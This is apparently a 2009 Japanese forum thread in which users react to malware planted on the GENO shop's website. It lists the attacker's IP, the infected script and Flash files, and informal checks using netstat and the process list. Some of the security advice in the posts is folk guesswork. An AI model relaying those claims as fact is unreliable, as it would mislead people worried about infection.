なんでそこまでして注文したいんだ？ｗ糞なショップなのにｗ

用も無いのにわざと接続してるやつも居るだろ

まぁしないけどｗ
そうけばLynx、PDF自動実行する設定にしてたわ。あぶな・・・

なんかパスとか入力するとカーソルが一個前に動いて入力した文字が逆にならぶんだけど、
自動ＤＬ対策かと思ったらグーグルでもなった。これひょっとしたらウイルスかな？

今見たらco.jpの方もやられてるのな。

ノート用DDRやHDDで色々買わせてもらってる
糞ショップとは言えないかな
個人的には無くなってほしくないかな
オクぼったくりよりは全然いい
まぁ社員乙とか言われるんだろうけど

わざとウィルス仕込んだのなら別だが

ちょっと前に安物PCでスレ立っていたから
踏んだ奴多そうだな

こないだのNEC祭りで買えなかった厨が発狂したとかなの？

どう考えても放置し過ぎだよな
もう通報しちゃったほうがいいんじゃない？

今踏んだらなんともなかったぞ

http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.geno-web.jp%2F&x=56&y=9
もう安全か？

糞管理だからまた仕込まれるなｗ

>>860
まだだめじゃん

genoなら社員が仕込んだってこともありえそうだなｗ

踏んだ人に聞きたいんだけど
再起動したら重いの無くなった？

今日の10時に電凸してみるか

ちくしょう！もうこんな所から買わないぞ！
といってもSDカードしか買ったこと無いけど

genoアウトレット
Parse error: syntax error, unexpected T_VARIABLE in /home/lcvirtualdomain/geno.co.jp/htdocs/outlet/index.php on line1
なんて表示されるんだけど死んでる？

アキバが近所だから送料無料がないと絶対通販は使わないな

歩き回って最安探すの大変じゃん

やられた。
pdfは起動しなかったけどfox落ちた。
readerは9.0。

9.0もかよー

ADOBE READER 9.1だがブラウザ落ちた
とりあえず変なバッチファイルとかは作られていないようだが

2日にアクセスして特に不具合でてないんだけど大丈夫だよね?

これかよ
昨日からＰＣの調子が悪い
ＩＥが落ちる
ＡＶＧがぶっ壊れた

>>871
起動のときに重くなるからすぐ分かる。ならんのなら大丈夫だろ。

>>874
>>1の画像のとおりページファイル使用量が跳ね上がってブラウザが落ちたが
起動というのはどれの起動の事？

カスペは４月４日の朝の更新で対応しているようだな。

liveCDのLinuxを起動させてのぞいてみようぜ！これなら確実に安全だろ

http://ftp.jaist.ac.jp/pub/Linux/PCLinuxOS/live-cd/english/preview/pclinuxos-2009.1.iso

セキュリティソフトが対応してない未知の脅威って
結構身近なところにあるもんだね

久々に恐怖を味わったよ

>>872
大丈夫だと思うけど心配ならcmd.exeが起動してないかみてみたら？

>>844いまググったけどSystem Idle ProcessがCPU使用率一番高いのは当たり前なんだなw
>>540てめえのせいでびびったじゃねーかwww

>>879
起動してなかった
朝起きてこれだから焦った これで飯食える

653 PAC-3(コネチカット州) New! 2009/04/05(日) 02:40:32.04 ID:uVA9mQjx[1回目]
アドビ9使ってノートンでスキャンしたけどクリーンインスコしとけば完全に安心だよな？クレカも使ってるしこのあいだもヤフオクしたしやばいかな？

682 PAC-3(コネチカット州) New! 2009/04/05(日) 02:48:55.46 ID:uVA9mQjx[2回目]
>>660
もうクリーンインスコしちゃったw環境とは？

730 SM-3(コネチカット州) New! 2009/04/05(日) 03:28:05.16 ID:uVA9mQjx[3回目]
親のクレカ使用、ヤフオクも利用したばっかだとどんな危険性がある？踏んだからいまクリーンインスコしてるんだが

781 PAC-3(コネチカット州) New! 2009/04/05(日) 04:33:26.20 ID:uVA9mQjx[6回目]
>>771
使ったのは入院する前に名義人が自分のPCを使ってクレカを使ってました。ヤフオクも入院する少し前に簡単決済で支払ってました。それでもアウトかな？

842 PAC-3(コネチカット州) New! 2009/04/05(日) 06:14:27.39 ID:uVA9mQjx[7回目]
>>540にSystem Idle ProcessがあってCPU喰いまくってたらやばいって書いてあるけど本当？クリーンインスコしてもかなりくってるよ

880 SM-3(コネチカット州) New! 2009/04/05(日) 07:59:33.95 ID:uVA9mQjx[8回目]
>>844いまググったけどSystem Idle ProcessがCPU使用率一番高いのは当たり前なんだなw
>>540てめえのせいでびびったじゃねーかwww

svchost.exeってのがいっぱい動いてるんだけど。これって普通？

>>883
それは普通

svchost.exeで検索して自分で判断して！

>>643に書かれている対応ソフトを入れている。

netstatを実行して94.247.2.195に接続していない。

再起動直後にタスクマネージャーで
cmd.exe(コマンドプロンプト　netstatを実行しようと自分で起動しているとか言うオチもある。だから再起動直後にｗ)
conime.exe(コマンドプロンプトでかなを使う時に常駐する奴だったと思う。)
が実行されていない

Genoにアクセスした記憶がない。

GenoにアクセスしたがAcrobat(Readerを含む)が起動した覚えがない(ブラウザがクラッシュした記憶がない)。


↑に数個当てはまるなら安全だろ。

>>883
6個以上は危険。
起動時から自動で何かマズいものが走ってる可能性が高い。

9.1でも検索しとけ。
確実に出てくる。

>>575
最近のウイルスって物理フォーマットまで壊すのか、すげえなw

つーかさ、スキャンがまだ終わらん。。。
もう寝ようかな。。
午後に買い物つきあわないかんし
全くGENOのおかげで全然寝られねーじゃんか、ふざけんなｗｗ

>>889
ブートに寄生するタイプはむしろ古いタイプ。

よくわからんが、カスペ大勝利ってことでFA？

　　　　　　　　　　　ＮＯＤ３２　　　　最強　　　伝説



　

avastでスキャン中でとりあえずCドライブは問題なしなんだけど
この件に関して言えばCが問題なければ大丈夫だよね？
スキャン放置してそろそろ寝ようと思うんだが。。。

いつでもレタスの推奨環境教えて

なんにも検出しないしリーダーも自動起動してないしU.batも検索してもないし・・・しかし不安だ・・・

中古PCとPCパーツに、ただ今無料でウィルスもお付けいたしております。

>>10
FireFoxだと全部ページ読み込み終わればサクサクだけど
ＩＥにエンジン切り替えた途端落ちた

>>890
http://kickback.cc/upload/stored/up10577.jpg
＼(^o^)／

結局いつからウィルスまみれになってたかはまだわからない、でOK？
2日に覗いてんだけどアウトかな…

実行したスキャン
・ニフティのオンライン　→　問題なし
・エフセキュアのオンライン　→　問題なし
・ウイルスバスター　→　問題なし
・今avastスキャン中

もう僕は寝ます
お休みなさい。。。

>>899
てめぇウイルス貼り付けるのも犯罪なのわかってんだろうな
絶対許さないからな。

>>901
びびりすぎだろｗｗｗ
ポート確認だけで十分だよ

>>899
お目目が真っ赤だよクソが

こえーよ

ν速民って情弱多すぎｗｗｗｗｗｗ
おめえら二度と情弱者馬鹿にすんなよｗｗｗｗｗ

>>893
http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

最新版Ａｖａｓｔでスキャンかけたら、Google Toolbarのフォルダの下のほうにルートキット？マルウェア？が
見つかったという警告が出ました。

なんじゃこりゃ。

>>900
2日はニュー即でgenoスレ立ってて、そこそこ伸びてるし、
流石に、その日からウィルス貼られてるなら、とっくに報告あがってるだろ。
２ｃｈでの初の報告が土曜の午前だから、それ前後が怪しい。
実際はgenoの報告がくるまで分からないけど。

ビーポイントの人はNGにしたほうがいい？
http:なんたらが鬱陶しいんだけど。

普通に商品とか見れてるけどヤバイの？

>>10
IEで見ると残り2500項目とか出てﾜﾛﾀ
そして残り2項目で落ちました

>>909
>実際はgenoの報告がくるまで分からないけど。

まぁそうなんだけど。でもありが�d
うち帰ったら挙動チェクする。

俺AVGだけだから怖くて観にいけない
セキュリティに詳しいおまえら頼んだぞ

スキャン終わって正確な情報が出てきた。

ファイルの名前
C:\Program Files\Google\Google ToolbarNotifier\5.1.1309.3572\swg.dll\[Embedded_R#4a898]

結果
感染： Win32:Rootkit-gen [Rtk]

オペレーション
ファイルの削除に成功しました


これは何？
不安何だ。誰か教えて？

【客の返品】GENOを語るスレ29【オク出品】

これはｍじなのかｗｗ？

403 名無しさん＠編集中 sage New! 2009/04/05(日) 08:43:38 ID:P1DN6MoD
hs.2-195.zlkon.lv [94.247.2.195]

ラトビアだってｗ　ここに繋げて何やってるんだろうね

>>10
Operaだと余裕だがIE死んだ
またしてもOpera最強伝説が実証されたと

客の情報入ったパソコンでエロサイトにいったと
つまりパソ屋なんてその程度なんだよ

>>917
こえええええええ

ウィルススキャンやっと終わった
次はブートタイム検査だ

ウインドウズが起動しなくなってしまった
窓の画像出て読み込んでるところまでは行くんだが
もうどうしようもないのかこれ

東欧キターーー
ttp://ja.wikipedia.org/wiki/%E3%83%A9%E3%83%88%E3%83%93%E3%82%A2

おはよう
まだHPはそのままなのかな。

>>918
IE7で余裕だよ
http://www2.uploda.org/uporg2142082.jpg

>>925
ひでぇデスクトップだ

>>925　きったねー

すげー美人
すげーイケメン

今さっき踏んだんだが、ブラウザが落ちたり重くなったりという事はないし
最新バージョンのAvastも無反応だったんだが、大丈夫なのかね？

ゲノのメインのケツに貼り付いてるこれかな？

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-524772-1";
urchinTracker();
</script>

var _uacct=""; // set up the Urchin Account

urchin　[名] 1 ((古風))いたずらっ子, わんぱく小僧, （一般に）男の子, 少年. 2 ＝sea urchin. ［ラテン語ricius（ハリネズミ）］

別に大して悪質じゃ無い気もするけど

ならエイプリルフールの残り火でしょ。

>>931
そう見せかけて、鯖のデータ引っこ抜くのが
目的ですよ

10時まで放置のつもりか？

http://preview.tinyurl.com/4yks9r
これが詳細か

一夜明けたけどどうなった？

ttp://up.mugitya.com/img/Lv.1_up90601.png

AdobeReader入れてない人は関係無さげだから少しは良かったじゃん。

AdobeReader9.1だけどブラウザ落ちたよ。
ノートンとニフティオンラインでスキャンしたけど検知なし。
数日後には対応しているかもだからそれまで買い物とかは控えようと思う。

ポート2223 つったら RockWell CSP3 か・・・・
ルーターで開けてない限り何も無いと思うけど
感染済み（トロイがポート開けてる）PC探してるのかな

いまさっきGENO見て、Adobe Readerエラー出てきた俺が飛んできましたよ

結論から言うと、 >>159 と >>207 の状態だね
しかも複数の.jsに仕込まれてる

ajax_lib.js
anketo_form.js
banner_koukoku.js
geno_topxml.js
geno_xml01.js
osusume.js
salesplash.js

とりあえず確認したのはこれくらい

俺のところではPDFは確認できなかったが、
/news/?id=3 で、T44.swfってFlashをダウンロードしてた

というわけで今から何仕込まれてるのか調べてくる

>>930-931
UrchinはGoogleのWeb解析ソフト。問題なし

foxit readerならOK?

http://h-ishida.hp.infoseek.co.jp/troi-house/troi.html

なんだよNovaって　英会話かよｗ

>>942
PDFの方は大丈夫だけど
Flashは別問題じゃね？ブラウザの設定しだいになる

DSP版XPを買ったら中古のPC100、128MBメモリをつけてきたGenoか

俺もAdobeReader9.1だけどブラウザ落ちた。
カスペも無反応だったし、検索しても検知なし。
USBから起動するパスワード管理ソフト使ってるので
PC内にはクレカやネットバンクのパスワードはないから
少しは安心してるけど・・・。
とりあえず今できる対策ってあります？

>>945
それは秋葉でもあるけどね〜＞ゴミメモリ

Avast最新なんだがひっかからなかった
Webシールドを標準にしてると駄目だったりするのか？

セキュリティホールと言うよりgetPlusを利用されてるだけでアドベのチョンボじゃないの？

まて・・・長屋ってなんだ？

>>945
ケースの中に貼り付けておけば何の問題もなく認証通せるんだから良いだろ
邪魔にならない

Avira検出。
AdobeReader9.10入れてるけど落ちた。
キャッシュ消したら落ちなくなった・・・。

Adobeとか冗談だろ

ウイルスセキュリティZEROは反応ないけど不安だからオンラインスキャン逝ってくる

122.221.10.234がwww.geno-web.jpのIPらしいが
ググって見たら去年の12月あたりにコメントスパムの踏み台に使われまくってたようだな

>>955
流石糞GENOと言わざるを得ないｗ

explorer.exeがユーザー名ではなく”SYSTEM”になっていたら
即削除しないと危険

ccc.exeが起動してる・・・・

>>944
うわぁ、テンポラリフォルダに94.247.2.195/news/?id=3あったわ・・・
やべーな、フラッシュなんて全然更新してなかったから昔のままだわ。
しかもウィルスソフトはシマンテックだし・・・・

antivir大敗北なのけ？ｗ
avastにもどるわｗ

全員、アウトぉ〜

>>941
/news/?id=3 で、T44.swfっていうのはどこ見ればわかるの？
.swfはランダムファイル名だと思うんだけど・・・・
アドレスはやっぱり94.247.2.195？

N速って情弱情弱って馬鹿にするわりには
このスレ酷い初心者っぷりが滲み出てますねｗｗｗｗｗｗｗｗｗ

>>963
コネチカットの癖に

>>964
言い換えれば物好きな勇者が多いって証拠です。

.|.-=・‐.　 ‐=・=-　　|;;/

10時過ぎても放置とか流石過ぎる。

linkhist.txtの中身みて唖然とした・・・

IE8+Adobe Reader 9.1で踏んだらIE落ちた。
カスペとa squeredオンラインスキャンで異常なし。

＼(^o^)／ｵﾜﾀ

別スレで開いたらカスペ教授に怒られた
マルウェアがなんたらかんたらと


ギャーなくなったんだね

まだ放置だなんて……GENO恐ろしい子！！

休日に対処するわけないだろ馬鹿

てすと

>>962
コマンドプロンプトで直に見るか、ファイルコピー→どこかのフォルダに貼り付け
でファイル名出てくるよ

＞アドレスはやっぱり94.247.2.195？
Yes


何仕込まれてるか調べてみたが、とりあえず何もなさそうな気が・・・
Adobe ReaderもFlashも、最近のバージョンだったせいかな

普通に見られるんですけど。＠Pen３（Ubuntu 8.10）

IE7で踏んでみたらIE起動する度に
問題が発生したので終了しますが出るんだけど
どうすればいいの？

GENOの中の人は何やってんの!!

当然花見だろ

GENO放置プレイいいかげんにしろ

>>977
XP SP2までならIEをアンインスコして火狐持っているなら火狐からMSのサイトなり何なりからIEをインスコすればいいと思うが
その前に念のためセーフモードの状態でウィルス検索した方がいいかも。

>>955
わろた

ttp://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=122.221.10.234&num=50

そろそろまとめてくれないかなー

>>982
HOST:122x221x10x234.ap122.ftth.ucom.ne.jp

ゲノサイト落としたほうがいいかも知れんなw

おまえらおはよう

電凸まだかよ

ウィルス感染ごめんなさいセールに期待してる

>>988
そこでまたウイルスの入ったPCを売るわけですね

続々と他スレでGENO誘導貼られまくってるｗ

ウイルスの入ったサーバーで管理してる商品を買いますのはこわいでございますね

PDFアプリなんて元から入れてないな
マニュアルなんて全く読まないしな

>>988
asusが回収したウィルス入りEeeBoxが売りに出されるのですね分かります

次スレたのむ

Trj.Geno.Aに認定

211.1.219.73 こいつがさっきから繋いでくるようになった

1日に注文した俺は・・・・

俺なんてしょちゅう127.0.0.1とかいうとこからアクセスされてるよ。
半ばあきらめてるが。

このスレ埋めれば多少は拡散も緩まるだろ

1000ならGENO倒産

このスレッドは１０００を超えました。
もう書けないので、新しい職を探して下さい。。。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　ニュース速報
　　　　　　　　　　　　　　http://www.hellowork.go.jp/